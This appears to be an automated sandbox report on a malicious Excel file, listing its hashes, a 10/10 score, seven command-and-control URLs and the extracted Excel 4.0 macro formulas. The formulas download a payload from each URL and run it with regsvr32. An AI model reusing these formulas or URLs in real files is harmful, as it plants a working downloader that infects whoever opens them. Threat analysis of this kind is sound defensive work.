General

  • Target

    ec2b508004ebd386e134fca69c00c1cbaed37a83e6fd13e74292f42acad1ef83

  • Size

    35KB

  • Sample

    241111-w2n4easmcs

  • MD5

    0448ebf1de6cdec0cdeea4eed59421ce

  • SHA1

    b56a90acc8d969644a4b866d7a8a336007b0ba84

  • SHA256

    ec2b508004ebd386e134fca69c00c1cbaed37a83e6fd13e74292f42acad1ef83

  • SHA512

    3be255ca5971df759b9a897b04b8829834bef648c5eea86ac34a81c05effd35ac8a09d523e88f5e1b8779d4c4e13eac3e4e9fbb5d8cdc835da6fbf39a4900072

  • SSDEEP

    768:ghtqi5eiNlAjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooood7O:ghtqigGUOZZ1ZYpoQ/pMA8i

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://bb2play.com/wzzx/9tamtuJMSndL/

https://romusreselling.xyz/wordpress/bSX/

https://localart.net/wp-content/uploads/I4c5SsknUlq/

https://www.crazy97.com/wp-includes/XbbGnN3Xabn7Z/

https://grchen.top/wordpress/bIGq8phSAMn/

https://onceintheflow.com/wp-includes/SimplePie/6XVotHuU/

https://sarc.in/wp-admin/9IDe7r7/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bb2play.com/wzzx/9tamtuJMSndL/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://romusreselling.xyz/wordpress/bSX/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://localart.net/wp-content/uploads/I4c5SsknUlq/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.crazy97.com/wp-includes/XbbGnN3Xabn7Z/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://grchen.top/wordpress/bIGq8phSAMn/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://onceintheflow.com/wp-includes/SimplePie/6XVotHuU/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sarc.in/wp-admin/9IDe7r7/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://bb2play.com/wzzx/9tamtuJMSndL/

xlm40.dropper

https://romusreselling.xyz/wordpress/bSX/

xlm40.dropper

https://localart.net/wp-content/uploads/I4c5SsknUlq/

xlm40.dropper

https://www.crazy97.com/wp-includes/XbbGnN3Xabn7Z/

xlm40.dropper

https://grchen.top/wordpress/bIGq8phSAMn/

xlm40.dropper

https://onceintheflow.com/wp-includes/SimplePie/6XVotHuU/

xlm40.dropper

https://sarc.in/wp-admin/9IDe7r7/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://bb2play.com/wzzx/9tamtuJMSndL/

xlm40.dropper

https://romusreselling.xyz/wordpress/bSX/

xlm40.dropper

https://localart.net/wp-content/uploads/I4c5SsknUlq/

Targets

    • Target

      ec2b508004ebd386e134fca69c00c1cbaed37a83e6fd13e74292f42acad1ef83

    • Size

      35KB

    • MD5

      0448ebf1de6cdec0cdeea4eed59421ce

    • SHA1

      b56a90acc8d969644a4b866d7a8a336007b0ba84

    • SHA256

      ec2b508004ebd386e134fca69c00c1cbaed37a83e6fd13e74292f42acad1ef83

    • SHA512

      3be255ca5971df759b9a897b04b8829834bef648c5eea86ac34a81c05effd35ac8a09d523e88f5e1b8779d4c4e13eac3e4e9fbb5d8cdc835da6fbf39a4900072

    • SSDEEP

      768:ghtqi5eiNlAjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooood7O:ghtqigGUOZZ1ZYpoQ/pMA8i

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks